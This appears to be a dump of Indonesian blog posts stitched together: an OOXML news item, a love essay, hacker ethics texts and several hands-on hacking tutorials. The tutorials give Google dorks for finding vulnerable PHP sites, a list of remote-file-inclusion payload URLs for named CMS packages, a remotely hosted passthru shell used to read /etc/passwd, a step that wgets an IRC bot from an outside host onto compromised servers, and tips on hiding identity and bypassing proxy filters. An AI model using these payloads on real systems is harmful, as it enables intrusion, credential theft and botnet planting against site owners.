The Contradictory Nature of OOXML

"the Microsoft Office XML-based format specification, OOXML, is now in the adoption queue at ISO/IEC. That process takes six months, and has two steps. During the first one-month step, any member may submit 'contradictions,' which means aspects in which a proposed standard conflicts with already adopted ISO/IEC standards and Directives. Those contradictions must then be 'resolved' (which does not necessarily mean eliminated), and these resolutions are then presented back to the members to consider during the five-month voting stage that follows. A month isn't very long to do a line-by-line analysis of a 6,000-page spec, but experts in the national standards bodies around the world are doing just that. What they are finding includes the use of proprietary, hard-wired elements rather than incorporation of available ISO/IEC standards; additional Microsoft technology that must be emulated (but is not covered by the Microsoft patent pledge); elements that can't be implemented without Microsoft technical assistance; dependencies on Windows itself; mandatory bugs; and more. And then there's also the fact that OOXML heavily overlaps ODF — a platform-independent, already-adopted ISO/IEC. It promises to be an interesting battle." And an anonymous reader adds word of the release, after 10 months of development, of Docvert 3.0, an open-source web service that converts DOC files to Oasis OpenDocument 1.0 (download the source here).

LOVE ISN'T BLIND

" When two people love each other, nothing is more
imperative and
delightful than giving. " - Guy de Maupassant -

Cinta berpijak pada perasaan sekaligus akal sehat.
Miskonsepsi pertama
yang ditentang Bowman adalah manusia jatuh cinta
dengan menggunakan
perasaan belaka. Betul, kita jatuh cinta dengan
hati. Tapi agar tidak
menimbulkan kekacauan di kemudian hari, kita
diharapkan untuk juga
menggunakan akal sehat.

Bohong besar kalau kita bisa jatuh cinta dengan
begitu saja tanpa bisa
mengelak. Yang sesungguhnya terjadi, proses jatuh
cinta dipengaruhi
tradisi, kebiasaan, standar, gagasan, dan deal
kelompok dari mana kita
berasal.

Bohong besar pula kalau kita merasa boleh berbuat
apa saja saat jatuh
cinta, dan tidak bisa dimintai pertanggungjawaban
bila
perbuatan-perbuatan impulsif itu berakibat buruk
suatu ketika nanti.

Kehilangan perspektif bukanlah pertanda kita jatuh
cinta, melainkan
sinyal kebodohan. Cinta membutuhkan proses, Bowman
juga menolak anggapan
cinta bisa berasal dari pandangan pertama. "Cinta
itu tumbuh dan
berkembang dan merupakan emosi yang kompleks,"
katanya.

Untuk tumbuh dan berkembang, cinta membutuhkan
waktu. Jadi memang tidak
mungkin kita mencintai seseorang yang tidak
ketahuan asal-usulnya
dengan begitu saja.

Cinta tidak pernah menyerang tiba-tiba, tidak juga
jatuh dari langit.
Cinta datang hanya ketika dua individu telah
berhasil melakukan
orientasi ulang terhadap hidup dan memutuskan
untuk memilih orang lain
sebagai titik fokus baru. Yang mungkin terjadi
dalam fenomena "cinta
pada pandangan pertama" adalah pasangan terserang
perasaan saling
tertarik yang sangat kuat bahkan sampai
tergila-gila. Kemudian perasaan
kompulsif itu berkembang jadi cinta tanpa menempuh
masa jeda. Dalam
kasus "cinta pada pandangan pertama", banyak
orang tidak benar-benar
mencintai pasangannya, melainkan jatuh cinta pada
konsep cinta itu
sendiri. Sebaliknya dengan orang yang benar-benar
mencinta, mereka
mencintai pasangan sebagai persolinatas yang utuh.

Cinta tidak menguasai dan mengalah, tapi berbagi.
Bukan cinta namanya
bila kita berkehendak mengontrol pasangan. Juga
bukan cinta bila kita
bersedia mengalah demi kepuasan kekasih. Orang
yang mencinta tidak
menganggap kekasih sebagai atasan atau bawahan,
tapi sebagai pasangan
untuk berbagi, juga untuk mengidentifikasi diri.
Bila kita berkeinginan
menguasai kekasih (membatasi pergaulannya,
melarangnya beraktivitas
positif, mengatur seleranya berbusana, selalu
mengkritik semua
kekurangannya) atau melulu mengalah (tidak protes
bila kekasih berbuat
buruk, tidak keberatan dinomorsekiankan), berarti
kita belum siap
memberi dan menerima cinta.

Cinta itu konstruktif.
Individu yang mencinta berbuat sebaik-baiknya demi
kepentingan sendiri
sekaligus demi (kebanggaan) pasangan. Dia berani
berambisi, bermimpi
konstruktif, dan merencanakan masa depan.
Sebaliknya dengan yang jatuh
cinta impulsif. Bukannya berpikir dan bertindak
konstruktif, dia
kehilangan ambisi, nafsu makan, dan minat terhadap
masalah sehari-hari.
Yang dipikirkan hanya kesengsaraan pribadi.
Impiannya pun tak mungkin
tercapai. Bahkan impian itu bisa menjadi subsitusi
kenyataan.

Cinta terhitung sehat bila saat dekat dan jauh
dari pasangan, kita
menyukainya dalam kadar sebanding.

Cinta tidak bertumpu pada daya tarik fisik
Dalam hubungan cinta, daya tarik fisik memang
penting. Tapi bahaya bila
kita menyukai kekasih hanya sebatas fisik dan
membencinya untuk banyak
faktor lainnya. Saat jatuh cinta, kita menikmati
dan memberi makna
penting bagi setiap kontak fisik. Kontak fisik,
ketahuilah, hanya terasa
menyenangkan bila kita dan pasangan saling
menyukai personalitas
masing-masing. Maka bukan cinta namanya, melainkan
nafsu, bila kita
menganggap kontak fisik hanya memberi sensasi
menyenangkan tanpa makna
apa-apa. Dalam cinta, afeksi terwujud belakangan
saat hubungan kian
dalam. Sedang nafsu menuntut pemuasan fisik sedari
permulaan.

Cinta tidak buta, tapi menerima
Cinta itu buta? Tidak sama sekali. Orang yang
mencinta melihat dan
menyadari sisi buruk kekasih. Karena besarnya
cinta, dia berusaha
menerima dan mentolerir. Tentu ada keinginan agar
sisi buruk itu
membaik. Namun keinginan itu haruslah didasari
perhatian dan maksud
baik. Tidak boleh ada kritik kasar, penolakan,
kegeraman, atau rasa
jijik. Nafsulah yang buta. Meski pasangan sangat
buruk, orang yang
menjalin hubungan dengan penuh nafsu menerima
tanpa keinginan
memperbaiki. Juga meninggalkan pasangan saat
keinginannya terpuaskan,
hanya karena pasangan punya secuil keburukan yang
sangat mungkin
diperbaiki.

Cinta memperhatikan kelanjutan hubungan
Orang yang benar-benar mencinta memperhatikan
perkembangan hubungan
dengan kekasih. Dia menghindari segala hal yang
mungkin merusak
hubungan. Sebisa mungkin dia melakukan tindakan
yang bisa memperkuat,
mempertahankan, dan memajukan hubungan. Orang yang
sedang tergila-gila
mungkin saja berusaha keras menyenangkan kekasih.
Namun usaha itu
semata-mata dilakukan agar kekasih menerimanya,
sehingga tercapailah
kepuasan yang diincar. Orang yang mencinta
menyenangkan pasangan untuk
memperkuat hubungan.

Cinta berani melakukan hal menyakitkan
Selain berusaha menyenangkan kekasih, orang yang
sungguh-sungguh
mencinta memiliki perhatian, keprihatinan,
pengertian, dan keberanian
untuk melakukan hal yang tidak disukai kekasih
demi kebaikan. Seperti
seorang ibu yang berkata "tidak" saat anaknya
meminta es krim, padahal
sedang flu.

Begitulah kita semua seharusnya bersikap pada
pasangan....

Php Bugs

Pada awalnya saya menulis PhpInjection hanya untuk pengetahuan sekilas saja.Tapi tampaknya masih banyak orang yang bertanya dan tampaknya makin hari makin banyak bugs yang ditemukan. Hal ini juga dikarenakan makin banyak orang menggunakan dan mengandalkan CMS (Content management system)sebagai langkah cepat dalam membuat suatu website. Memang CMS ini membuat proses pembuatan website menjadi sangat cepat, tapi tanpa disadari hal ini membuat ada nya persamaan antara website yang satu dan yang laen.

Nah klo ada yang sama, karena dibangun diatas script yang sama maka bugs nya pun sama. Berikut ini saya akan lampirkan list bugs yang saya dapat.Buat target.

Lihat aja disini

Nah dari list yang didapat tadi maka kamu bisa memulai pencarian kamu. Setelah dapat target maka kmu ganti dech :

http://www.injection.com/cmd? menjadi http://geocities.com/k4k3_rgb/test?&cmd

Nah jadi dech dan liat hasilnya. Kalo ndak bisa berarti sudah di patch so langsung dech cari yang laen.

Mengakali Proxy Server

Nah pada suatu hari ada teman bertanya : "Mas aku kok tidak bisa buka friendster yach di kantor ku, kayaknya di blog dech di server nya ....". Kenapa hal ini bisa terjadi?Karena Proxy server dan rules pada firewall di Gateway nya.
Nah sebelum itu saya akan memberikan sedikit gambaran tentang proxy server dan Firewall Gateway.

Proxy server;
Apa itu Proxy server?Mari kita tanyakan 'Tante Wiki terlebih dulu...'
"A proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. A client connects to the proxy server, then requests a connection, file, or other resource available on a different server. The proxy provides the resource either by connecting to the specified server or by serving it from a cache. In some cases, the proxy may alter the client's request or the server's response for various purposes.
A proxy server can also serve as a firewall."

Secara singkatnya adalah server atau mesin untuk mengatur lalu lintas data dalam jaringan dan digunakan untuk menyimpan halaman web yang pernah dikunjungi dalam cache nya untuk memanage penggunaan bandwidth.Sebagai gambaran adalah alamat URL yang sudah pernah dikunjungi akan tersimpan di cache dan semua pemanggilan terhadap URL tertentu akan diarahkan pada simpanan di cache atau di tetapkan rules tertentu.Nah terkadang pada suatu instansi tertentu ditetapkan rules tertentu untuk membatasi penggunaan oleh user, yah contohnya kantor yang tidak dapat membuka www.friendster.com pada saat jam kantor, atau tidak dapat dibukanya website dengan content Pornografi dan kekerasan pada jaringan kampus atau pun sekolah.

Firewall;
Pada kesempatan sebelumnya saya sudah membahas mengenai hal yang satu ini, Lihat artikel Si Tembok Api.Nah yang intinya adalah sebuah sistem baik perangkat keras maupun perangkat lunak yang mengatur dan mencatat lalu lintas data yang keluar dan masuk dari dan ke jaringan lokal.

Nah karena ditetapkannya aturan pada kedua sistem kita inilah maka kita tidak dapat seenaknya menggunakan internet.Tapi jangan khawatir ternyata semua nya itu dapat kita akali.

1. Cara Pertama;
Nah sekali lagi semuanya itu ditetapkan berdasarkan suatu rules, yang dalam hal ini adalah ketentuan penggunaan lalu lintas dan port. Nah yang paling sederhana untuk membatasi pembatasan ini adalah dengan menggunakan anonymous server atau proxy server lain di luar Proxy atau gateway instansi kita.Mangapa hal ini memungkinkan?Karena yang dicatat adalah bahwa kita membuka hanya ke alamat URL dari anonymous browsing atau proxy tersebut sehingga URL mana yang kita tuju dari proxy atau anonymous browsing itu tidak akan terlihat pada proxy atau firewall kita.

Nah untuk contohnya coba ajah : www.guardster.com, www.freebrowsing.com, dll
Nah untuk list proxynya liat ajah di : http://familycode.atspace.com/irc.htm atau di http://www.samair.ru/proxy/socks.htm

2. Cara kedua;
Nah pada cara kedua ini adalah dengan melakukan 'tunneling' terhadap proxy server kita. Nah untuk yang satu ini diperlukan sedikit pengetahuan dan informasi.Nah sebelumnya saya sudah bilang bahwa semuanya hanyalah pengaturan lalu lintas dari data dan port apa yang digunakan.Nah cari taulah port berapa saja yang digunakan dan untuk apa. Nah lakukanlah tehnik scanning. Nah setelah kita tahu maka gunakanlah berbagai software yang tersedia di Internet untuk melakukan tunneling proxy. Jangan males yah banyak kok. Tanya ajah om GOOGLE keyword "proxy tunneling".
sebagai contohnya : InvisibleBrowsing, bypass Client, Proxyway, dll
Nah setting dech proxy yang digunakan, dan jika diperlukkan lakukan setting port yang digunakan.

Nah itulah cara ngakali Proxy pada kantor atau kampus kamu. Nah sebenarnya masih ada satu cara lagi dan cukup mudah. Ini adalah kelebihan dari Paman kita yang terkenal baik hati dan menyediakan pada kita segalanya.Ya itulah 'Om Google' kita.GOOGLE...bukan untuk searching tapi untuk jadi anonymous.Kok bisa?Nah kita gunakan salah satu fasilitasnya yaitu translate.

Coba Dech : http://translate.google.com/translate?u=

Nah sebenarnya ini adalah fasilitas GOOGLE untuk mentranslate isi website, tetapi jika tidak ada akan ditampilkan aslinya.Namun cara ini cukup kuno dan kalo admin nya pinter hal ini dapat di cegah.
Nah demikian dulu Saya berbagi informasinya.

Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.

Keampuhan Om Google

Setelah sekian lama tidak membuat posting baru akhirnya hari ini aku dapat melakukannya lagi. Beberapa hari lalu daku keluar kota sehingga boro2 posting, konek internet juga ndak. Nah pada kesempatan kali ini Daku ingin memberikan informasi sedikit mengenai salah satu search engine paling powerful di dunia. Mungkin sudah tidak asing lagi bagi anda menggunakannya."GOOGLE" yah itulah search engine kita. Yang memudahkan kita semua dalam mendapatkan informasi tentang apa saja di seluruh dunia dalam waktu yang singkat.Atau yang dalam panggilan akrabnya kita sering menyebut 'Om Google'.

Pada kesempatan ini saya akan memberikan sedikit tips saja untuk anda dalam menggunakan semua fasilitas google ini.
Nah langsung dech kita mulai. Untuk mengetahui fasilitas apa saja yang terdapat dalam google maka kita bisa melihat pada link :

-= http://www.google.com/intl/en/options/ =-

Itulah semua layanan yang disediakan oleh google. Nah pada posting pertama ini saya hanya akan memberikan sedikit tips dalam penggunaan Google.

1. Pertama, lakukanlah pencarian dengan detail. Dalam hal ini masukkan keyword selengkapnya sehingga pencarian dapat lebih terarah.Berikut ini saya lampirkan beberapa Google Syntax:

-. [intitle:]
Memungkinkan kita melakukan search berdasarkan title atau judul dari halam web.Google akan membatasi hasil pencarian sesuai dengan permintaan kita. Misal : "intitle:login", maka google akan menampilkan semua halaman web dengan judul atau title "login". Perlu diingat bahwa command2 tersebut hanya akan mengenali satu kata sesudahnya. Kalau kita menggunakan "intitle:login password", maka google akan menampilkan halam dengan judul atau title login dan terdapat kata password di halaman web tersebut.
Bila kita menginginkan pencarian dengan title atau judul "login password" maka kita mengetikkan "allintitle:login password".

-. [inurl:]
Memungkinkan kita melakukan pencarian pada suatu situs tertentu saja. Misal : "password inurl:www.jasakom.com", maka pencarian dengan keyword password akan dilakukan pada situs www.jasakom.com.

-. [site:]
Memungkinkan kita melakukan pencarian untuk membatasi pencarian pada site atau domain tertentu. Misal : "hacking site:co.id" akan dilakukan pencarian dengan keyword hacking pada semua site dengan domain .co.id.

-. [filetype:]
Memungkinkan kita melakukan pencarian untuk membatasi pencarian terhadapa file dengan ekstensi tertentu saja. Misal : "filetype:doc site:gov", maka akan ditampilkan semua link berisikan file dengan ekstensi .doc di domain gov.

-. [link:]
Memungkinkan pencarian untuk menampilkan halaman-halaman web yang mempunyai link ke suatu situs tertentu. Misal : "link:www.123.net", maka akan ditampilkan semua halaman situs yang mempunyai link ke www.123.net.

-. [related:]
Memungkinkan pencarian untuk menampilkan hasil-hasil yang mirip dengan web yang di spesifikasikan. Misal : "www.blackhat.com" akan menampilkan list halaman-halaman yang mirip blackhat.com.

-. [intext:]
Menampilkan hasil pencarian terhadap kata-kata tertentu, dengan mengabaikan URL serta judul dari halaman web.Misal : "intext:expoits" akan menampilkan halaman web yang ada kata-kata expoits.

-. [phonebook:]
Membantu pencarian untuk orang atau alamat.Misal : "phonebook:Anto+Bandung", maka akan ditampilkan informasi mengenai seseorang berupa alamat pada lokasi yang dicari.

Nah demikian dulu sedikit sharingnya mengenai Search Engine 'GOOGLE'.


Sumber : Buku 'Hack Attack, Konsep, Penerapan dan Pencegahan'

Hacking Ethical

HACKING ETHICALS ARE :

Above all else, do no harm.

Do not damage computers or data if at all possible. Much like the key element of the Hippocratic Oath.

Hacking is a quest for knowledge; there is no intrinsic need or desire to destroy. But it is generally held that system-cracking for fun and exploration is ethically OK as long as the cracker commits no theft, vandalism, or breach of confidentiality. However, accidents and pranks that hackers view as harmless may cause the victims to lose time and effort.

Protect privacy.

This is typically reconciled with the free information ethos by separating public information from private. How the line is drawn is, of course, a question of personal (and political) views.

Waste not, want not.

Computer resources should not lie idle and wasted. Using idle time and perhaps leaving suggestions for improved performance is seen as a favor.

Exceed limitations.

"Telling a hacker something can´t be done, is a moral imperative for him to try."

The communicational imperative.

Communicating with and associating with peers is a fundamental human right. Some see it as strong enough to motivate violation of laws and regulations.

Leave no traces.

Keeping quiet about your exploits is not only for your protection. It also helps other hackers avoid getting caught or losing access.

Share!

Information increases in value by sharing it with other people. Data can be the basis for someone else´s learning; software can be improved collectively.

Fight cyber-tyranny.

Hacking is necessary to help protect the world from dystopian development of global information systems a la 1984.

Trust, but test.

By engaging hands-on with technical and social systems, your discoveries can contribute to improving the systems.

Lirik MySQL lewat PhpInjection

Pada kesempatan lalu kita sudah bisa mencari target dan mendapatkannya. Abis itu dari pada di deface kita sudah menanam psybnc ato bot di dalamnya. Pada kesempatan kali ini saya akan memberikan sedikit tutor gimana yach klo jalan-jalan di dalam server itu sejenak.Enaknya khan kita bisa tau databasenya.Baiklah kita mulai tutor kita kali ini.
1. Inget aturan nomor satu sebelum memulai semuanya. Jangan lupa kompi udah terhubung dulu ke internet.
2. Nah duduk di depan kompi ... hmmm apa yang kurang yach ....Oh iya jangan lupa ROkok dan Kopi.
3. Setelah semua siap. Nah kita mulai dech.
4. Liat artikel PhpInjection, disitu kita sudah dapet target.Contoh:
-= http://www.target.com/index.php?page=http://www.geocities.com/k4k3_rgb/test?&cmd =-
Nah kmu ganti dech di address barnya jadi :
http://www.target.com/index.php?page=http://www.geocities.com/k4k3_rgb/antri?&cmd

Nah Nongol dech tuh isi database nya. Hmm udah dapet listnya enaknya kita ngapain lagi yach.hehehhe ....

Klo ndak jalan berarti database nya bukan SQL atau mungkin Server database nya pisah sama webserver nya.
Nah cobain lagi dech cari target lain

Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.

Membuat Eggdrop lewat PhpInjection

Pada artikel saya yang terakhir saya menulis tentang bagaimana melakukan Injection lewat script php.Pada kesempatan ini kita akan membuat Eggdrop pada PhpInjection yang kita buat.
Nah mending kita langsung ajah. Nah kamu tinggal masukkin dech di address bar:

http://www.target.com/index.php?page=http://www.geocities.com/k4k3_rgb/test?&cmd

1. Kamu cari folder mana yang bisa kamu masuki dengan cara find /-perm 777 -type d
Atau kalo nggak mau repot langsung aja kamu wget di /var/tmp atau /tmp

2. Nah wget dech bot nya di :

ketik : wget http://www.geocities.com/k4k3_rgb/bot/linux.tgz

3. nah setelah itu kamu ekstrak :

ketik : tar -zxvf linux.tgz
misal : [januar@server tmp]$ tar -zxvf linux.tgz

4. Abis itu masuk dech ke directory .linux. Nah setelah berada pada directory .linux kamu ketik :

[januar@server .linux]$ ./nadya

maka akan keluar command seperti berikut :

Cara Penggunaan :

./nadya pr1 pr2 pr3 pr4 pr5 pr6

pr1 = nama file conf yg akan dibuat
pr2 = nick
pr3 = ident
pr4 = IP
pr5 = nama channel (jangan pake #)
pr6 = nick owner

[januar@server .linux]$

Nah bikin dech bot sesuai keinginan kmu.
Contoh : ./nadya botk4k3 botk4k3 CrewK4k3 (ip tuh server) hackcrew k4k3

[januar@server .linux]$ ./nadya botk4k3 botk4k3 hackcrew 192.168.21.21 hackcrew k4k3

5. Nah setelah keluar perintah berikut :

Config file : botk4k3
set nick "botk4k3"
set username "hackcrew"
set my-hostname "192.168.21.21"
set my-ip "192.168.21.21"
set basechan "#hackcrew"
set owner "k4k3"
cat: kinana.conf: No such file or directory

ketik: ./eggdrop -m botk4k3 untuk menjalankan bot anda

Thanks to k4k3 for his idea, You Are My Teacher !!!

maka ketikanlah :
./eggdrop -m botk4k3

contoh : [januar@server .linux]$ ./eggdrop -m botk4k3

6. Nah selesai dech bikin botnya.Kamu tinggal tunggu dech di channel kmu. Trus sapa dech botnya.
ketik: /msg botk4k3 hello

Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.

Sumber : http://semparuk.mynew.ws/news.php

Php Injection (updated every day)

Pada kesempatan kali ini kita akan membahas mengenai PhpInjection, apa itu PhpInjection? Bagaimana menemukannya dan bagaimana penanganannya.
Pertama kali kita membutuhkan sedikit keahlian yaitu mengenal sedikit tentang apa dan bagaimana itu script php. Script php merupakan salah satu script yang sampai saat ini banyak digunakan oleh seorang webmaster, disamping rival nya Java. Script php ini begitu 'Powerfull', mengapa dikatakan demikian karena dalam script php ini kita bisa melakukan banyak hal. Mulai dari membuat file, membuat counter, membuat date, membuat bukutamu, membuat forum (salah satunya PhpBB), mengakses database secara langsung maupun juga membuat gambar dan animasi. Kesemuanya itu sudah terdapat dalam fungsi dari script php ini. Nah karena hal itu lah maka masih banyak orang yang menggunakannya untuk membangun sebuah website, selain karena cukup mudah dipelajari.
Disini kita tidak akan membahas mengenai bagaimana melakukan semua itu, karena maaf ini bukan saatnya untuk belajar php tapi saatnya belajar hacking dengan menggunakan kelebihan dari script php dan kelemahan dari webmaster yang menggunakannya. Jadi cukup sudah basa-basinya.
Begitu banyak orang menanyakan bagaimana untuk mencari bugs pada script php yang ada, sebenarnya ilmu ini sudah lama dan tutorial nya juga sudah begitu banyak di tulis oleh berbagai orang pada berbagai website tentang security jaringan dan hacker, baik milik komunitas maupun milik pribadi. Pada kesempatan ini biarlah saya mengulas sedikit dan mengulang kembali tentang injection pada script php yang lebih dikenal dengan nama PhpInjection.

1. Seperti dijelaskan diatas script php banyak memiliki kelebihan dan mudah digunakan. Nah otomatis banyak webmaster yang menggunakan nah otomatis sasaran kita juga semakin banyak (walau untuk sekarang ini hanya sedikit karena webmaster sudah menyadari kekurangannya).
2. Sebelum kita menggunakan ilmu kita dan memulai pencarian kita, jangan lupa selalu siapkan 2 point penting dari semuanya. Apa itu? Tentu saja 'ROKOK' dan 'KOPI'. Nah setelah kita santai dan dapat berkonsentrasi maka kita bisa mulai aksi kita.
3. Pertama kali kita harus mengakui kehebatan dari om 'Google' dari sana lah kita mendapatkan semuanya. Nah untuk menambah kasanah pengetahuan tentang 'Google hack ada baiknya kita membaca buku 'Hack Attack' Cara dan penanggulanganya oleh teman kita dari jasakom.Atau kunjungi saja langsung situs www. jasakom.com.
Nah untuk memulai pencarian kita masukkanlah kata kunci berikut untuk mendapatkan target kita :
Untuk forum :
allinurl:my_egallery site:.org
allinurl:xgallery site:.org
allinurl:coppermine site:.org
allinurl:4nAlbum site:.org
allinurl:PNphpBB2 site:.org
allinurl:ihm.php?p=
allinurl:.php?bodyfile=
allinurl:/default.php?page=home
allinurl:/folder.php?id=
allinurl:main.php?pagina=
allinurl:/modules.php?name=allmyguests
allinurl:AshNews atau allinurl: /ashnews.php
allinurl:ihm.php?p=*
allinurl:kietu/hit_js.php
allinurl:/Popper/index.php?
keyword : "Powered by phpBB 2.0.6"
keyword : "powered by CubeCart 3.0.6"
keyword : "powered by paBugs 2.0 Beta 3"
Keyword : "powered by AllMyLinks"
keyword : /phorum/login.php
keyword : "powered eyeOs"
allinurl:/includes/orderSuccess.inc.php?glob=
allinurl:modules.php?name=Forums

Harap diperhatikan bahwa masih banyak alternatif yang lain yang bisa digunakan sebagai keyword.
Kalo memang rajin coba liat ajah listnya di :
-= http://www.geocities.com/k4k3_rgb/list.txt =-

4. Nah cara kamu menginject adalah dengan index.php?page=http://www.jasakom.com
atau kalau kamu tidak berhasil coba dengan list berikut :
Ganti modul :

1. my_egallery: /modules/My_eGallery/public/displayCategory.php?basepath=
2. xgallery: /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. coppermine: /modules/coppermine/themes/default/theme.php?THEME_DIR
4. 4nAlbum: /modules/4nAlbum/public/displayCategory.php?basepath=
5. PNphpBB2 /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
6. AllMyGuests: /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
7. /Popper/index.php? : /Popper/index.php?childwindow.inc.php?form=
8. kietu : kietu/index.php?kietu[url_hit]=
9. "Powered by phpBB 2.0.6" : &highlight=%2527.include($_GET[a]),exit.%2527&a=
10. "powered by CubeCart 3.0.6" : /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
11. "powered by paBugs 2.0 Beta 3" : /class.mysql.php?path_to_bt_dir=
12. "powered by AllMyLinks" : /include/footer.inc.php?_AMLconfig[cfg_serverpath]=
13. /phorum/login.php : /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

14. "powered eyeOs" : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

15. /includes/orderSuccess.inc.php?glob : http://[target]/[path]/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

16 allinurl:modules.php?name=Forums : /modules.php?name=
=============================================================================
http://www.target.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/index_overview.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/image-gd.class.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/album.class.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/show_random.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/main.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.injection.com/cmd?

==========================================================================
5. Kalau kamu bisa melihat web jasakom.com, berarti sasaran sudah ditemukan. Jika belum berarti tutup dan beralih lah pada website berikutnya. Sebagai catatan bahwa untuk sekarang begitu banyak web sudah di patch, so jangan patah semangat dan teruslah berusaha. Dan juga jangan lupa semua orang yang membuka website dapat diketahui ipnya dari log file web server, terutama sekarang banyak web jebakan untuk mencatat ip yang mencoba menyerang, so jangan lupa gunakanlah anonymous proxy ato fake address untuk mengaburkan identitas kamu.

6. Nah klo udah dapet target maka mari kita selanjutnya kita harus cari webhosting gratis. Webhosting ini tidak perlu mendukung php.

Kemudian kita buat file dengan nama test.txt (nama file bebas). Isi file tersebut sebagai berikut:

passthru($test);
?>

simpan file tersebut, lalu upload ke webserver yang telah kita cari sebelumnya.

Sekarang kita siap untuk melakukan aksi kita.
Ketikkan di address bar dari browser kita alamat berikut:

http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cal

jika kita berhasil maka kita akan mendapatkan respon sebagai berikut:
June 2004 Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30


7. Nah klo kamu mau exploit coba yang satu ini :
http://www.example.com/index.php?module=subjects&func=listpages&subid=[SQL]
http://www.example.com/index.php?module=subjects&func=viewpage&pageid=[SQL]
http://www.example.com/index.php?module=subjects&func=listcat&catid=[SQL]

8. Gimana kalo kita masukkan perintah untuk menampilkan password account di server tersebut??

http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cat /etc/passwd

Nah kita bisa dapet dech passwd nya. Hmm setelah dapet passwd ngapain lagi yach ... terserah dech. Tapi jangan lah kasian mending kasih tau admin suruh patch sistem. hehehe

Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.

Thanks to,
#hackcrew, #binushacker, #kampunghacker, #batamhacker, #yogyafree dan semua pihak yang tidak bisa di sebut kan satu persatu.
Sumber :
Pengalaman Pribadi penulis
-= http://www.jasakom.com/article.aspx?ID=517 =-
-= http://www.clemens-fatek.com =-
-= http://www.yogyafree.net =-
-= http://www.hitam-putih.com =-

Etika 'Hackers'

Seorang 'Hackers' juga punya etika, kode etik yang pada mulanya diformulasikan dalam buku karya Steven Levy berjudul Hackers: Heroes of The Computer Revolution, pada tahun 1984.

Kode etik hacker tersebut tertulis:
1. Akses ke sebuah sistem komputer, dan apapun saja dapat mengajarkan mengenai bagaimana dunia bekerja, haruslah tidak terbatas sama sekali.
2. Segala informasi haruslah gratis.
3. Jangan percaya pada otoritas, promosikanlah desentralisasi.
4. Hacker haruslah dinilai dari sudut pandang aktifitas hackingnya, bukan berdasarkan standar organisasi formal atau kriteria yang tidak relevan seperti derajat, usia, suku maupun posisi.
5. Seseorang dapat menciptakan karya seni dan keindahan di komputer.
6. Komputer dapat mengubah kehidupan seseorang menjadi lebih baik.

Manifesto 'Hackers'

Manifesto Hacker dibuat oleh seorang hacker yang menggunakan nickname The Mentor dan
pertama kali dimuat pada majalah Phrack (volume 1 / issue 7 / 25 September 1986).
Manifesto Hacker tersebut adalah:
1. Ini adalah dunia kami sekarang, dunianya elektron dan switch, keindahan sebuah baud.
2. Kami mendayagunakan sebuah sistem yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami kriminal.
3. Kami menjelajah, dan kalian sebut kami kriminal.
4. Kami mengejar pengetahuan, dan kalian sebut kami kriminal.
5. Kami hadir tanpa perbedaan warna kulit, kebangsaan, ataupun prasangka keagamaan, dan kalian sebut kami kriminal.
6. Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut kriminal.
7. Ya, aku memang seorang kriminal.
8. Kejahatanku adalah rasa keingintahuanku.
9. Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakan dan pikirkan, bukan pada penampilan mereka.
10. Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak kan kalian maafkan.
11. Aku memang seorang hacker, dan inilah manifesto saya.
12 Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.
